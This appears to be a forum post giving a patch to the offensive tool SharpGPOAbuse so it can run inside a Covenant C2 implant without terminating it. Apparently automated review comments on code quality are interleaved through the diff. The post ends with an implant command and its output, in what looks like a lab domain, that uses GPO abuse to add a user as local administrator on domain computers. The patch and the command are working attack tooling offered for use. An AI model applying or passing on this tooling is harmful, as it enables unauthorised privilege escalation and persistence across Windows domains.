For those who come across this topic and want to use Covenant and SharpGPOAbuse together, you'll want to try the patch below:
diff --git a/SharpGPOAbuse/Program.cs b/SharpGPOAbuse/Program.cs
index e39762c..2d69b96 100644
--- a/SharpGPOAbuse/Program.cs
+++ b/SharpGPOAbuse/Program.cs
@@ -228,7 +228,8 @@ namespace SharpGPOAbuse
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "[!] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
int new_ver = 0;
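Review bot: The added `//System.Environment.Exit(0);` line here, and in every later hunk of this patch, leaves dead code behind; delete the call outright, since the diff already records what was removed. The surrounding messages still say "Exiting..." although the process now keeps running after `return;`, so the wording is stale; something like `Console.WriteLine(ex.Message + " [!] Aborting.");` would describe what happens. The enclosing method starts and ends outside this hunk.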
@@ -499,13 +500,15 @@ namespace SharpGPOAbuse
{
Console.WriteLine(ex.Message);
Console.WriteLine("[!] Could not update versionNumber attribute!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
}
else
{
Console.WriteLine("[!] GPO not found!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
using (System.IO.StreamReader file = new System.IO.StreamReader(path))
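Review bot: Both failure paths in this hunk now leave through a bare `return;`, so the caller cannot tell a failed version update from a successful one; before the patch the process ended here and nothing after the call could run. The call sites visible in later hunks (`UpdateVersion(..., "AddLocalAdmin", "Computer")` and `UpdateVersion(..., "NewImmediateTask", "User")`) do not look at a result, and the sample output at the end of the page suggests the SYSVOL file is written before this step, so a failure here presumably leaves a half-applied GPO change with nothing reporting it. Consider returning `bool` (`return false;` on these paths) and stopping in the caller with `if (!UpdateVersion(...)) return;`, so the run states clearly that a partial change remains and needs reverting. The method signature is outside the hunk; the value-less `return;` implies it is currently `void`.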
@@ -575,13 +578,15 @@ namespace SharpGPOAbuse
catch
{
Console.WriteLine("[!] Could not retrieve the GPO GUID. The GPO Name was invalid. \n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return null;
}
}
if (String.IsNullOrEmpty(GPOGuid))
{
Console.WriteLine("[!] Could not retrieve the GPO GUID. The GPO Name was invalid. \n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return null;
}
Console.WriteLine("[+] GUID of \"" + GPOName + "\" is: " + GPOGuid);
return GPOGuid;
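Review bot: `return null;` changes this method's contract: it used to either return a GUID or end the process, and now every caller has to handle null. The patch adds `String.IsNullOrEmpty(GPOGuid)` guards at four call sites, but any call outside the visible hunks would go on to build a SysVol path from a null GUID, so the whole file should be checked for remaining callers. A doc comment would make the contract explicit, e.g. `/// <returns>The GPO GUID, or null if the name could not be resolved (the error is already printed).</returns>`. The method signature is outside this hunk.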
@@ -600,10 +605,14 @@ namespace SharpGPOAbuse
catch
{
Console.WriteLine("[-] Could not find user \"" + UserAccount + "\" in the " + Domain + " domain.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
+ if (String.IsNullOrEmpty(GPOGuid)) {
+ return;
+ }
string start = @"[Unicode]
Unicode=yes
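Review bot: The guard added in this hunk puts the opening brace on the `if` line, while the three other guards this patch adds and the surrounding code put it on its own line; match the file with `if (String.IsNullOrEmpty(GPOGuid))` followed by `{` on the next line. The silent `return;` is reasonable because GetGPOGUID has already printed the error, but a short comment such as `// GetGPOGUID already reported the failure` would save the next reader a lookup.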
@@ -624,7 +633,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -652,7 +662,8 @@ Revision=1";
if (exists && !Force)
{
Console.WriteLine("[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!\n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if memberships are defined and force is used
@@ -680,7 +691,8 @@ Revision=1";
}
}
UpdateVersion(Domain, distinguished_name, GPOName, GPT_path, "AddLocalAdmin", "Computer");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if memberships are not defined
@@ -718,7 +730,10 @@ Revision=1";
{
String hidden_ini;
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
-
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
String path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
String hidden_path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
@@ -747,7 +762,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -759,7 +775,8 @@ Revision=1";
if (File.Exists(path))
{
Console.WriteLine("[!] A Startup script with the same name already exists. Choose a different name.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
if (File.Exists(hidden_path))
@@ -861,6 +878,10 @@ Revision=1";
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
String path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
String GPT_path = path + "\\GPT.ini";
// Check if GPO path exists
@@ -875,7 +896,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding scheduled tasks exists in SYSVOL
@@ -921,12 +943,14 @@ Revision=1";
{
UpdateVersion(Domain, distinguished_name, GPOName, GPT_path, "NewImmediateTask", "User");
}
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
else
{
Console.WriteLine("[!] The GPO already includes a ScheduledTasks.xml. Use --Force to append to ScheduledTasks.xml or choose another GPO.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
}
else
@@ -958,11 +982,15 @@ Revision=1";
catch
{
Console.WriteLine("[-] Could not find user \"" + UserAccount + "\" in the " + Domain + " domain.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
-
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
string text = @"[Unicode]
Unicode=yes
[Version]
@@ -988,7 +1016,8 @@ Revision = 1
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -1017,7 +1046,8 @@ Revision = 1
{
// Curently there is no support for appending user rightsto exisitng ones
Console.WriteLine("[!] The GPO already specifies user rights. Select a different attack.\n[!] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if user rights are not defined
test:
Assembly /assemblyname:"SharpGPOAbuse" /parameters:"--AddLocalAdmin --UserAccount \"analyst2\" --GPOName \"test\""
[+] Domain = els-child.els.local
[+] Domain Controller = child-dc01.els-child.eLS.local
[+] Distinguished Name = CN=Policies,CN=System,DC=els-child,DC=eLS,DC=local
[+] SID Value of analyst2 = S-1-5-21-23589937-599888933-351157107-1106
[+] GUID of "test" is: {4D882DB0-0EB3-4195-9BBB-287B812DF68A}
[+] Creating file \\els-child.els.local\SysVol\els-child.els.local\Policies\{4D882DB0-0EB3-4195-9BBB-287B812DF68A}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
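Without the patch the Grunt just dies: each System.Environment.Exit(0) call ends the whole process the assembly was loaded into, not just the SharpGPOAbuse run.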